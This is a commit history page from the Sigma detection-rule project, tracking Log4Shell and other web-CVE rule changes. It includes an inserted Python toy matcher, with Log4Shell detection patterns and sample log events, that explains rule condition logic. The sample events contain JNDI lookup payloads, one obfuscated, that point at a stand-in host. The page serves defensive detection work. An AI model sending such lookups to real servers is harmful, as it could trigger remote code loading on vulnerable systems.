Commit Graph

244 Commits

Author SHA1 Message Date
Florian Roth 35d4c8bc69 fix: FPs noticed in THOR testing 2022-02-21 10:15:27 +01:00
Florian Roth e2aa3665af fix: avoid Microsoft Defender detections
We keep the strings as specific as necessary while avoiding Microsoft Defender detections on the rule files
2022-02-06 08:56:54 +01:00
frack113 4631d0c482 remove invalid tag 2022-01-19 18:23:30 +01:00
frack113 f7e670d55e Simple Quote 2022-01-11 13:40:53 +01:00
Florian Roth e055ec1d52 refactor: change all " of them" expressions 2022-01-11 10:59:57 +01:00
frack113 c6014b1205 Change status to test 2022-01-07 07:04:24 +01:00
frack113 73f258e2d1 Change double quote to quote 2022-01-06 14:02:35 +01:00
Fred Frey 44fecf8ebd typo 2021-12-16 12:12:37 -05:00
Fred Frey 05245b5ac7 implemented @frack113's `1 of selection*` suggestion 2021-12-16 12:09:39 -05:00
Fred Frey 972dfbc4d2 Log4j: OR each section vs. implicit AND
When the original is compiled, it requires one TRUE from each field (implicit AND) ... I believe the intent is to search all fields of any trace, hence the explicit OR in "condition"
2021-12-16 01:53:33 -05:00
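The implicit-AND vs. explicit-OR distinction raised in the commit above, shown on a toy Sigma-style matcher. This is an added illustration written for this page, not code from the SigmaHQ repository, pySigma, or any Sigma backend: the field names (cs-uri-query, cs-user-agent, cs-referer), the three JNDI patterns, and all sample events are constructed assumptions. Only the `|contains` modifier and exact match are implemented; the obfuscated sample event is included to show what a set of plain patterns does not cover.

```python
"""Toy Sigma-style condition evaluator (added example, not SigmaHQ code).

Sigma semantics modelled here:
  * values listed under one key are ORed;
  * keys inside ONE selection map are ANDed (the implicit AND);
  * `1 of selection*` ORs every selection whose name starts with "selection".
"""
from typing import Dict, List

Event = Dict[str, str]
Selection = Dict[str, List[str]]  # "field|modifier" -> list of values


def _key_matches(event: Event, key: str, values: List[str]) -> bool:
    """One key of a selection map: any listed value may match (OR)."""
    field, _, modifier = key.partition("|")
    actual = event.get(field, "").lower()
    for value in values:
        needle = value.lower()
        if modifier == "contains":
            hit = needle in actual
        elif modifier == "":
            hit = needle == actual
        else:  # keep the toy honest: refuse modifiers it does not model
            raise ValueError(f"unsupported modifier: {modifier}")
        if hit:
            return True
    return False


def selection_matches(event: Event, selection: Selection) -> bool:
    """All keys of a single selection map must match: the implicit AND."""
    return all(_key_matches(event, k, v) for k, v in selection.items())


def one_of(event: Event, selections: Dict[str, Selection], prefix: str = "selection") -> bool:
    """`1 of selection*`: explicit OR across every selection named selection*."""
    return any(selection_matches(event, sel)
               for name, sel in selections.items() if name.startswith(prefix))


# Assumed patterns (single-slash scheme form); the real rules carry many more.
JNDI_PATTERNS = ["${jndi:ldap:/", "${jndi:rmi:/", "${jndi:dns:/"]

# Version A: all fields in ONE selection -> every field must carry a pattern.
SINGLE_SELECTION: Dict[str, Selection] = {
    "selection": {
        "cs-uri-query|contains": JNDI_PATTERNS,
        "cs-user-agent|contains": JNDI_PATTERNS,
        "cs-referer|contains": JNDI_PATTERNS,
    }
}

# Version B: one selection per field -> `1 of selection*` fires on any field.
SPLIT_SELECTIONS: Dict[str, Selection] = {
    "selection_uri": {"cs-uri-query|contains": JNDI_PATTERNS},
    "selection_ua": {"cs-user-agent|contains": JNDI_PATTERNS},
    "selection_ref": {"cs-referer|contains": JNDI_PATTERNS},
}

# Constructed sample web-server events (not real traffic).
EVENTS: Dict[str, Event] = {
    "ua_only": {
        "cs-uri-query": "id=1",
        "cs-user-agent": "${jndi:ldap://203.0.113.5:1389/a}",
        "cs-referer": "-",
    },
    "all_fields": {
        "cs-uri-query": "q=${jndi:rmi://203.0.113.5:1099/b}",
        "cs-user-agent": "${jndi:ldap://203.0.113.5:1389/a}",
        "cs-referer": "${jndi:dns://203.0.113.5/c}",
    },
    "benign": {
        "cs-uri-query": "page=2",
        "cs-user-agent": "Mozilla/5.0",
        "cs-referer": "https://example.com/",
    },
    # Obfuscated lookup: the plain patterns above do not cover it, which is
    # why the later commits on this page add obfuscation variants.
    "obfuscated_ua": {
        "cs-uri-query": "id=1",
        "cs-user-agent": "${${lower:j}ndi:ldap://203.0.113.5:1389/a}",
        "cs-referer": "-",
    },
}


def compare() -> Dict[str, Dict[str, bool]]:
    """Evaluate every sample event under both rule layouts."""
    return {
        name: {
            "single_selection": one_of(ev, SINGLE_SELECTION),
            "split_selections": one_of(ev, SPLIT_SELECTIONS),
        }
        for name, ev in EVENTS.items()
    }


if __name__ == "__main__":
    for name, result in compare().items():
        print(f"{name:14s} {result}")
```

The ua_only event is the case the commit describes: with all three fields in one selection it never fires, because a single request rarely carries the payload in the URI, the User-Agent and the Referer at once; one selection per field plus `1 of selection*` turns that into the intended any-field match.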
Florian Roth baa5d3758d Merge branch 'master' into rule-devel 2021-12-13 18:05:17 +01:00
Florian Roth 51a4315ab9 fix: referrer > referer adjustments 2021-12-13 15:47:43 +01:00
Florian Roth fb167c5698 Merge pull request #2446 from izysec/patch-4
Added current known bypass patterns
2021-12-13 14:04:54 +01:00
Florian Roth 7b93291439 Merge pull request #2445 from izysec/patch-3
Added current known bypass patterns
2021-12-13 14:03:59 +01:00
Florian Roth 04ff26c786 Update web_cve_2021_44228_log4j_fields.yml 2021-12-13 11:47:55 +01:00
Florian Roth ea3f1c6228 changed expression
the last part is already covered by the expression in line 38, but we can add the one that obfuscates the `jndi`
2021-12-13 11:47:12 +01:00
izysec 5819aa9888 Added current known bypass patterns
Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
2021-12-13 15:51:25 +05:30
izysec 6c8b0c8fd8 Added current known bypass patterns
Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
2021-12-13 15:49:08 +05:30
Florian Roth 758334ac1c Merge branch 'rule-devel' of https://github.com/SigmaHQ/sigma into rule-devel 2021-12-13 09:02:38 +01:00
Florian Roth ef6fb35e2b more patterns for log4shell 2021-12-13 09:02:24 +01:00
Florian Roth d8613fedfe more Log4Shell patterns 2021-12-12 21:27:01 +01:00
Florian Roth 31ddcd4a0d Log4Shell - more patterns 2021-12-12 20:39:09 +01:00
Florian Roth 39217d4b44 rule: JNDIExploit 2021-12-12 13:16:05 +01:00
Florian Roth 63bb7673d6 Merge branch 'master' into rule-devel 2021-12-12 12:47:33 +01:00
Florian Roth 5da7537375 Merge pull request #2436 from izysec/patch-1
Additional IoC keywords added to log4j detection
2021-12-12 12:46:36 +01:00
Florian Roth 23f59180d5 updated Log4Shell rules 2021-12-12 12:40:14 +01:00
izysec 0b9fd530e6 Additional IoC keywords added to log4j detection
Source: https://community.riskiq.com/article/505098fc/description
2021-12-12 01:15:02 +05:30
izysec 61e7044d09 Additional IoC keywords added
https://community.riskiq.com/article/505098fc/description
2021-12-12 01:11:19 +05:30
Florian Roth a74eac7c7f refactor: added more variants to the field-based rule too 2021-12-11 08:23:43 +01:00
Florian Roth b9bc6646f9 improved log4j detection rule 2021-12-11 08:15:11 +01:00
Florian Roth 8ae7646b73 fix: duplicate ids 2021-12-10 16:14:14 +01:00
Florian Roth aef0179ba7 refactor: log4j rule refactoring 2021-12-10 16:01:43 +01:00
Florian Roth 07e4a9209c docs: more links 2021-12-10 13:31:28 +01:00
Florian Roth 06e41b1e57 refactor: single slash uri scheme + dns 2021-12-10 13:07:32 +01:00
Florian Roth a51c03f54c log4j CVE-2021-44228 2021-12-10 13:05:40 +01:00
Florian Roth 72e85fdc92 rule: Grafana CVE-2021-43798 2021-12-08 12:01:59 +01:00
Florian Roth 330fcf485c Merge branch 'master' into promote_status 2021-11-27 17:15:56 +01:00
frack113 01dc930c17 Change status for old rules 2021-11-27 11:33:14 +01:00
frack113 c6caab9e1e Fix optional section name 2021-11-27 11:27:40 +01:00
frack113 b81b5666ce fix field name 2021-11-23 18:47:42 +01:00
frack113 1cfca93354 Missing status in rules (#2284)
* add missing status
2021-11-19 22:32:26 +01:00
Florian Roth c6564908ef rule: Sitecore Pre-Auth RCE CVE-2021-42237 2021-11-17 19:01:35 +01:00
frack113 f8574fcd81 Add cve tags 2021-10-25 18:40:50 +02:00
Florian Roth 30213dba87 Merge pull request #2132 from SigmaHQ/rule-devel
New Rules
2021-10-09 19:19:45 +02:00
Florian Roth 195db4cffc refactor: made Apache RCE rule more robust 2021-10-09 18:48:02 +02:00
frack113 930d2d4223 fix id 2021-10-06 17:53:16 +02:00
frack113 dfd316c0ce Add web_iis_tilt_shortname_scan.yml 2021-10-06 17:46:15 +02:00
Florian Roth 7cf01c2f0c extended CVE-2021-41773 rule 2021-10-06 12:43:10 +02:00
Florian Roth 5576f50470 fix: title, add my name 2021-10-05 17:35:09 +02:00
Florian Roth 482df0a0ad rule: Apache Vuln CVE-2021-41773 2021-10-05 17:33:37 +02:00